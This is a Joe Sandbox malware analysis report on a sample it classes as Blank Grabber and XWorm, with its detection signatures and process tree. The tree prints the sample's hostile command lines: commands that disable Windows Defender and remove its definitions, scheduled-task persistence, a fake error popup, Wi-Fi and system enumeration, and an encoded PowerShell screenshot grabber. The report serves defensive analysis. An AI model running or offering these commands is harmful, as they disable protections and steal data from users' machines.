Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
sB2ClgrGng.exe

Overview

General Information

Sample name:sB2ClgrGng.exe
renamed because original name is a hash value
Original sample name:d69647cf1c96e058e4a9ed4887cc08a36c863751e711f98171e32cdc36478eda.exe
Analysis ID:1532621
MD5:4667ad84b811400babc982785614bb5f
SHA1:0016a4d0e998382722895dee4a062c0c318e37bf
SHA256:d69647cf1c96e058e4a9ed4887cc08a36c863751e711f98171e32cdc36478eda
Tags:BlankGrabberexeuser-Chainskilabs
Infos:

Detection

Blank Grabber, XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Blank Grabber
Yara detected Python Keylogger
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Removes signatures from Windows Defender
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses shutdown.exe to shutdown or reboot the system
Uses the Telegram API (likely for C&C communication)
Writes or reads registry keys via WMI
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Execution of Shutdown
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Stores files to the Windows start menu directory
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • sB2ClgrGng.exe (PID: 5816 cmdline: "C:\Users\user\Desktop\sB2ClgrGng.exe" MD5: 4667AD84B811400BABC982785614BB5F)
    • sB2ClgrGng.exe (PID: 2892 cmdline: "C:\Users\user\Desktop\sB2ClgrGng.exe" MD5: 4667AD84B811400BABC982785614BB5F)
      • cmd.exe (PID: 4248 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7188 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5544 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7224 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7616 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7072 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7292 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 1228 cmdline: C:\Windows\system32\cmd.exe /c "start bound.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • bound.exe (PID: 7280 cmdline: bound.exe MD5: 8D8BC4B4831CCCE11284D512630749C5)
          • schtasks.exe (PID: 7076 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 2596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • shutdown.exe (PID: 8592 cmdline: shutdown.exe /f /s /t 0 MD5: F2A4E18DA72BB2C5B21076A5DE382A20)
            • conhost.exe (PID: 8676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6980 cmdline: C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mshta.exe (PID: 7272 cmdline: mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • cmd.exe (PID: 7320 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7408 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7660 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7968 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7676 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7956 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7852 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7988 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7872 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8052 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7452 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7992 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8116 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8196 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8056 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 8208 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 8052 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 8312 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 8392 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8556 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 8792 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 8980 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADCB.tmp" "c:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8740 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8880 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8768 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 8872 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 9172 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7848 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7912 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8304 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8328 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
